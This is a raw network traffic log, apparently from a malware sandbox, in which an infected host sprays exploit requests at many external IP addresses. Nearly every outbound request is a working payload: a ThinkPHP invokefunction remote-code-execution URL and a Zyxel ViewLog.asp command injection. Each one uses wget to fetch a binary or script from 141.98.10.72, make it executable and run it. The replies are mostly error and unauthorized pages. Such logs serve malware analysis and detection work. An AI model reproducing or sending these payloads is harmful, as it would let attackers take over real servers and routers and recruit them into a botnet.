Feb 14, 2024 09:31:26.358902931 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:09.365600109 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
811	192.168.2.15	38672	95.142.190.201	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.724522114 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
812	192.168.2.15	35044	95.101.88.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.733535051 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:43.954703093 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:30:43 GMT Date: Wed, 14 Feb 2024 08:30:43 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 31 64 64 35 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 34 33 26 23 34 36 3b 32 36 65 62 63 64 34 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.d1dd517.1707899443.26ebcd42</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
813	192.168.2.15	59690	95.100.205.132	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.758352995 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:44.003983021 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:30:43 GMT Date: Wed, 14 Feb 2024 08:30:43 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 36 63 61 34 64 36 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 34 33 26 23 34 36 3b 32 39 31 37 38 33 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.66ca4d68.1707899443.2917834</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
814	192.168.2.15	45826	95.167.23.17	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.761363029 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
815	192.168.2.15	39656	95.7.114.103	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.784051895 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
816	192.168.2.15	58168	45.201.246.177	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.820173979 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:43Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
817	192.168.2.15	52232	88.221.37.31	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.927469015 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:44.131093979 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:44 GMT Date: Wed, 14 Feb 2024 08:30:44 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 37 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 37 38 39 39 34 34 34 26 23 34 36 3b 31 38 39 64 35 63 34 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.97341060.1707899444.189d5c4a</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
818	192.168.2.15	55176	88.116.240.6	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:43.986490011 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
819	192.168.2.15	58204	45.201.246.177	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:44.338203907 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:44Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
820	192.168.2.15	59722	95.179.146.203	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:44.413480997 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:44.612704039 CET	404	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:44 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
821	192.168.2.15	33966	95.244.58.83	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:44.630446911 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:44.848043919 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Wed, 14 Feb 2024 08:30:44 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
822	192.168.2.15	41208	95.217.237.36	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:44.640108109 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:44.868016958 CET	315	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Wed, 14 Feb 2024 08:30:44 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
823	192.168.2.15	58220	45.201.246.177	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:44.852071047 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:44Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
824	192.168.2.15	58236	45.201.246.177	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:45.357058048 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:45Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
825	192.168.2.15	58240	45.201.246.177	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:45.857462883 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:45Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
826	192.168.2.15	46836	94.30.80.81	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:45.961819887 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
827	192.168.2.15	54900	94.123.120.12	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.020968914 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
828	192.168.2.15	47972	62.29.40.213	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.021020889 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
829	192.168.2.15	54792	94.187.97.138	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.021078110 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
830	192.168.2.15	49868	31.136.43.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.163739920 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:46.775887966 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:48.023823977 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:50.519767046 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:55.639813900 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:05.623457909 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
